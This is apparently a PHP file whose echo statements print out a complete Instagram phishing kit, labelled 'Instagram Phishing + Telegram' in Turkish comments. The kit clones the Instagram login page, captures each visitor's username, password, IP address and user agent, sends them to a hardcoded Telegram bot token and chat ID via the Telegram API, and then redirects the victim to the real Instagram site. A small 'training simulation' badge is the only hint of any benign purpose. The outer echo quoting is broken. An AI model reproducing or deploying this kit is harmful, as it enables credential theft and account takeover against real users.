<?php
echo '<?php';
echo '// ============================================================';
echo '// index.html - Instagram Phishing + Telegram (TEK DOSYA)';
echo '// Uzantı: .html  |  Çalışma: .htaccess ile PHP desteği';
echo '// Bot bilgilerin önceden eklendi.';
echo '// ============================================================';
echo '';
echo '$botToken = '8604225952:AAHoULyCnrkSQ1Pqjo3xa6UlZgwo7H5ObRA';';
echo '$chatID   = '1636656252';';
echo '';
echo 'if ($_SERVER['REQUEST_METHOD'] === 'POST') {';
echo '$username = isset($_POST['username']) ? trim($_POST['username']) : '';';
echo '$password = isset($_POST['password']) ? trim($_POST['password']) : '';';
echo '$response = ['status' => 'error', 'message' => ''];';
echo '';
echo 'if ($username !== '' && $password !== '') {';
echo '$ip         = $_SERVER['REMOTE_ADDR'] ?? 'Bilinmiyor';';
echo '$userAgent  = $_SERVER['HTTP_USER_AGENT'] ?? 'Bilinmiyor';';
echo '$date       = date('Y-m-d H:i:s');';
echo '';
echo '$message  = "🔐 YENİ INSTAGRAM GİRİŞ BİLGİSİ 🔐\n\n";';
echo '$message .= "👤 Kullanıcı: $username\n";';
echo '$message .= "🔑 Şifre: $password\n";';
echo '$message .= "🕒 Tarih: $date\n";';
echo '$message .= "🌐 IP: $ip\n";';
echo '$message .= "📱 User-Agent: $userAgent\n";';
echo '$message .= "-----------------------------\n";';
echo '$message .= "✅ Otomatik gönderim başarılı.";';
echo '';
echo '$url = "https://api.telegram.org/bot$botToken/sendMessage";';
echo '$postData = [';
echo ''chat_id' => $chatID,';
echo ''text'    => $message,';
echo ''parse_mode' => 'HTML'';
echo '];';
echo '';
echo '$ch = curl_init();';
echo 'curl_setopt($ch, CURLOPT_URL, $url);';
echo 'curl_setopt($ch, CURLOPT_POST, true);';
echo 'curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postData));';
echo 'curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);';
echo 'curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);';
echo 'curl_setopt($ch, CURLOPT_TIMEOUT, 10);';
echo '$result = curl_exec($ch);';
echo '$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);';
echo 'curl_close($ch);';
echo '';
echo 'if ($httpCode === 200 && $result !== false) {';
echo '$response['status']  = 'success';';
echo '$response['message'] = 'Giriş başarılı, yönlendiriliyorsunuz...';';
echo '} else {';
echo '$response['status']  = 'error';';
echo '$response['message'] = 'Telegram bağlantı hatası, lütfen tekrar dene.';';
echo '}';
echo '} else {';
echo '$response['status']  = 'error';';
echo '$response['message'] = 'Lütfen tüm alanları doldurun.';';
echo '}';
echo '';
echo 'if (!empty($_SERVER['HTTP_X_REQUESTED_WITH']) && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) === 'xmlhttprequest') {';
echo 'header('Content-Type: application/json');';
echo 'echo json_encode($response);';
echo 'exit;';
echo '}';
echo '';
echo 'if ($response['status'] === 'success') {';
echo 'header('Location: https://www.instagram.com/accounts/login/');';
echo 'exit;';
echo '} else {';
echo '$errorMessage = $response['message'];';
echo '}';
echo '}';
echo '?>';
echo '<!DOCTYPE html>';
echo '<html lang="tr">';
echo '<head>';
echo '<meta charset="UTF-8">';
echo '<meta name="viewport" content="width=device-width, initial-scale=1.0">';
echo '<title>Instagram - Giriş Yap</title>';
echo '<style>';
echo '* {';
echo 'margin: 0;';
echo 'padding: 0;';
echo 'box-sizing: border-box;';
echo 'font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Helvetica, Arial, sans-serif;';
echo '}';
echo 'body {';
echo 'background: #fafafa;';
echo 'display: flex;';
echo 'justify-content: center;';
echo 'align-items: center;';
echo 'height: 100vh;';
echo 'margin: 0;';
echo '}';
echo '.container {';
echo 'max-width: 380px;';
echo 'width: 100%;';
echo 'padding: 30px 25px;';
echo 'background: white;';
echo 'border: 1px solid #dbdbdb;';
echo 'border-radius: 12px;';
echo 'text-align: center;';
echo 'box-shadow: 0 4px 20px rgba(0,0,0,0.08);';
echo '}';
echo '.logo {';
echo 'font-size: 48px;';
echo 'font-weight: 700;';
echo 'font-family: 'Segoe UI', cursive;';
echo 'margin-bottom: 25px;';
echo 'color: #262626;';
echo 'letter-spacing: -1px;';
echo '}';
echo '.logo span { color: #0095f6; }';
echo 'input {';
echo 'width: 100%;';
echo 'padding: 14px 12px;';
echo 'margin: 6px 0;';
echo 'border: 1px solid #dbdbdb;';
echo 'border-radius: 6px;';
echo 'background: #fafafa;';
echo 'font-size: 14px;';
echo 'outline: none;';
echo 'transition: border 0.2s;';
echo '}';
echo 'input:focus {';
echo 'border-color: #a8a8a8;';
echo 'background: white;';
echo '}';
echo 'button {';
echo 'width: 100%;';
echo 'padding: 12px;';
echo 'margin-top: 12px;';
echo 'background: #0095f6;';
echo 'border: none;';
echo 'border-radius: 6px;';
echo 'color: white;';
echo 'font-weight: 700;';
echo 'font-size: 16px;';
echo 'cursor: pointer;';
echo 'transition: background 0.2s, opacity 0.2s;';
echo '}';
echo 'button:hover { background: #1877f2; }';
echo 'button:disabled {';
echo 'opacity: 0.6;';
echo 'cursor: not-allowed;';
echo '}';
echo '.error {';
echo 'color: #ed4956;';
echo 'font-size: 14px;';
echo 'margin-top: 14px;';
echo 'display: none;';
echo 'background: #fde8ea;';
echo 'padding: 10px;';
echo 'border-radius: 6px;';
echo '}';
echo '.error.show { display: block; }';
echo '.footer {';
echo 'margin-top: 22px;';
echo 'font-size: 13px;';
echo 'color: #8e8e8e;';
echo '}';
echo '.footer a {';
echo 'color: #0095f6;';
echo 'text-decoration: none;';
echo 'font-weight: 600;';
echo '}';
echo '.footer a:hover { text-decoration: underline; }';
echo '.simulation-badge {';
echo 'margin-top: 18px;';
echo 'font-size: 11px;';
echo 'color: #bbb;';
echo 'letter-spacing: 0.5px;';
echo '}';
echo '.spinner {';
echo 'display: inline-block;';
echo 'width: 18px;';
echo 'height: 18px;';
echo 'border: 3px solid rgba(255,255,255,0.3);';
echo 'border-radius: 50%;';
echo 'border-top-color: white;';
echo 'animation: spin 0.7s linear infinite;';
echo 'vertical-align: middle;';
echo 'margin-right: 8px;';
echo '}';
echo '@keyframes spin {';
echo 'to { transform: rotate(360deg); }';
echo '}';
echo '<?php if (isset($errorMessage)): ?>';
echo '.error { display: block; }';
echo '<?php endif; ?>';
echo '</style>';
echo '</head>';
echo '<body>';
echo '<div class="container">';
echo '<div class="logo">Insta<span>gram</span></div>';
echo '';
echo '<form id="loginForm" method="POST">';
echo '<input type="text" id="username" name="username" placeholder="Telefon numarası, kullanıcı adı veya e-posta" required autocomplete="off">';
echo '<input type="password" id="password" name="password" placeholder="Şifre" required autocomplete="off">';
echo '<button type="submit" id="submitBtn">Giriş Yap</button>';
echo '<div class="error <?php echo isset($errorMessage) ? 'show' : ''; ?>" id="errorMsg">';
echo '<?php echo isset($errorMessage) ? htmlspecialchars($errorMessage) : '❌ Kullanıcı adı veya şifre hatalı.'; ?>';
echo '</div>';
echo '</form>';
echo '';
echo '<div class="footer">';
echo '<a href="#">Şifreni mi unuttun?</a> · <a href="#">Kayıt ol</a>';
echo '</div>';
echo '<div class="simulation-badge">🔐 Eğitim simülasyonu · güvenlik testi</div>';
echo '</div>';
echo '';
echo '<script>';
echo 'document.getElementById('loginForm').addEventListener('submit', function(e) {';
echo 'e.preventDefault();';
echo '';
echo 'const username = document.getElementById('username').value.trim();';
echo 'const password = document.getElementById('password').value.trim();';
echo 'const btn = document.getElementById('submitBtn');';
echo 'const errorDiv = document.getElementById('errorMsg');';
echo '';
echo 'if (!username || !password) {';
echo 'errorDiv.textContent = '❌ Lütfen tüm alanları doldurun.';';
echo 'errorDiv.classList.add('show');';
echo 'return;';
echo '}';
echo '';
echo 'btn.disabled = true;';
echo 'btn.innerHTML = '<span class="spinner"></span> Giriş yapılıyor...';';
echo 'errorDiv.classList.remove('show');';
echo '';
echo 'const formData = new FormData();';
echo 'formData.append('username', username);';
echo 'formData.append('password', password);';
echo '';
echo 'fetch(window.location.href, {';
echo 'method: 'POST',';
echo 'headers: {';
echo ''X-Requested-With': 'XMLHttpRequest'';
echo '},';
echo 'body: formData';
echo '})';
echo '.then(response => response.json())';
echo '.then(data => {';
echo 'if (data.status === 'success') {';
echo 'window.location.href = 'https://www.instagram.com/accounts/login/';';
echo '} else {';
echo 'errorDiv.textContent = data.message || '❌ Bir hata oluştu, lütfen tekrar deneyin.';';
echo 'errorDiv.classList.add('show');';
echo 'btn.disabled = false;';
echo 'btn.innerHTML = 'Giriş Yap';';
echo '}';
echo '})';
echo '.catch(err => {';
echo 'errorDiv.textContent = '❌ Bağlantı hatası, lütfen tekrar deneyin.';';
echo 'errorDiv.classList.add('show');';
echo 'btn.disabled = false;';
echo 'btn.innerHTML = 'Giriş Yap';';
echo 'console.error('Fetch error:', err);';
echo '});';
echo '});';
echo '</script>';
echo '</body>';
echo '</html>';
?>